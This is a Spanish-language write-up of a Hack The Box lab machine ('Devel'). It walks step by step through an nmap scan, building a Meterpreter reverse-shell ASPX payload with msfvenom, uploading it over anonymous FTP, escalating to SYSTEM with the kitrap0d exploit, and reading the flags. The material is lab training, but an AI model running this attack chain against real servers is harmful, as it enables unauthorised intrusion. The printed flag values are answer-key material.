__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Devel

Hoy vamos a hackear la maquina de HTB llamada Devel.
  • Video
  • Enumeration
  • Para empezar hacemos un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.5 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 12:35 CEST Nmap scan report for 10.10.10.5 Host is up (0.037s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM aspnet_client | 04-05-20 09:33PM 2854 go.aspx | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 136.61 seconds
    Nos podemos conectar por FTP anonimamente, y vemos que el contenido del FTP es lo que se muestra en el servidor IIS (Web), asi que utilizamos msfvenom para generarnos un meterpreter/reverse_tcp en .aspx y subirlo al FTP.
  • Exploitation
  • sml@Cassandra:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=6666 -f aspx -o go.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2818 bytes Saved as: go.aspx
    Subimos al FTP nuestro .aspx
    sml@Cassandra:~$ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:sml): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put go.aspx local: go.aspx remote: go.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2854 bytes sent in 0.00 secs (18.5156 MB/s) ftp>
    Preparamos el handler en nuestra maquina para dejarlo a la escucha.
    msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 10.10.14.19 lhost => 10.10.14.19 msf5 exploit(multi/handler) > set lport 6666 lport => 6666 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.10.14.19:6666
    Visitamos http://10.10.10.5/go.aspx para obtener la shell.
    [*] Sending stage (180291 bytes) to 10.10.10.5 [*] Meterpreter session 1 opened (10.10.14.19:6666 -> 10.10.10.5:49196) at 2020-04-02 12:38:29 +0200 meterpreter > sysinfo Computer : DEVEL OS : Windows 7 (6.1 Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 0 Meterpreter : x86/windows meterpreter > shell Process 1280 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\web
  • Privilege Escalation
  • Ahora que tenemos una session abierta, vamos a utilizar post/multi/recon/local_exploit_suggester para encontrar algun exploit que nos permita elevar los privilegios.
    msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.5 - Collecting local exploits for x86/windows... [*] 10.10.10.5 - 30 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image : The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
    De todos los posibles, elegimos ms10_015_kitrap0d.
    msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1 session => 1 msf5 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 192.168.1.148:4444 [*] Launching notepad to host the exploit... [+] Process 620 launched. [*] Reflectively injecting the exploit DLL into 620... [*] Injecting exploit into 620 ... [*] Exploit injected. Injecting payload into 620... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Exploit completed, but no session was created. msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 264 4 smss.exe 324 488 dllhost.exe 344 336 csrss.exe 384 336 wininit.exe 396 376 csrss.exe 452 376 winlogon.exe 488 384 services.exe 496 384 lsass.exe 504 384 lsm.exe 608 488 svchost.exe 620 3532 notepad.exe x86 0 C:\Windows\system32\notepad.exe 672 488 svchost.exe 724 488 svchost.exe 796 452 LogonUI.exe 832 488 svchost.exe 888 488 svchost.exe 1000 488 svchost.exe 1092 488 svchost.exe 1180 488 spoolsv.exe 1216 488 svchost.exe 1316 488 svchost.exe 1384 488 svchost.exe 1424 488 svchost.exe 1512 488 VGAuthService.exe 1520 488 msdtc.exe 1540 488 vmtoolsd.exe 1568 488 svchost.exe 2020 608 WmiPrvSE.exe 2084 608 WmiPrvSE.exe 2780 488 sppsvc.exe 2812 488 svchost.exe 2892 488 SearchIndexer.exe 3044 2892 SearchProtocolHost.exe 3316 488 WmiApSrv.exe 3532 1568 w3wp.exe x86 0 IIS APPPOOL\Web c:\windows\system32\inetsrv\w3wp.exe meterpreter > migrate 620 [*] Migrating from 3532 to 620... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
  • user.txt
  • c:\Users>cd babis c:\Users\babis>dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\babis 17/03/2017 05:17 . 17/03/2017 05:17 .. 17/03/2017 05:17 Contacts 18/03/2017 02:14 Desktop 17/03/2017 05:17 Documents 17/03/2017 05:17 Downloads 17/03/2017 05:17 Favorites 17/03/2017 05:17 Links 17/03/2017 05:17 Music 17/03/2017 05:17 Pictures 17/03/2017 05:17 Saved Games 17/03/2017 05:17 Searches 17/03/2017 05:17 Videos 0 File(s) 0 bytes 13 Dir(s) 24.383.025.152 bytes free c:\Users\babis>cd Desktop c:\Users\babis\Desktop>dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\babis\Desktop 18/03/2017 02:14 . 18/03/2017 02:14 .. 18/03/2017 02:18 32 user.txt.txt 1 File(s) 32 bytes 2 Dir(s) 24.383.025.152 bytes free c:\Users\babis\Desktop>type user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8
  • root.txt
  • c:\Users>cd administrator c:\Users\Administrator>dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\Administrator 18/03/2017 02:16 . 18/03/2017 02:16 .. 18/03/2017 02:16 Contacts 18/03/2017 02:17 Desktop 18/03/2017 02:16 Documents 18/03/2017 02:16 Downloads 18/03/2017 02:16 Favorites 18/03/2017 02:16 Links 18/03/2017 02:16 Music 18/03/2017 02:16 Pictures 18/03/2017 02:16 Saved Games 18/03/2017 02:16 Searches 18/03/2017 02:16 Videos 0 File(s) 0 bytes 13 Dir(s) 24.383.737.856 bytes free c:\Users\Administrator>cd Desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\Administrator\Desktop 18/03/2017 02:17 . 18/03/2017 02:17 .. 18/03/2017 02:17 32 root.txt.txt 1 File(s) 32 bytes 2 Dir(s) 24.383.737.856 bytes free c:\Users\Administrator\Desktop>type root.txt.txt e621a0b5041708797c4fc4728bc72b4b
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".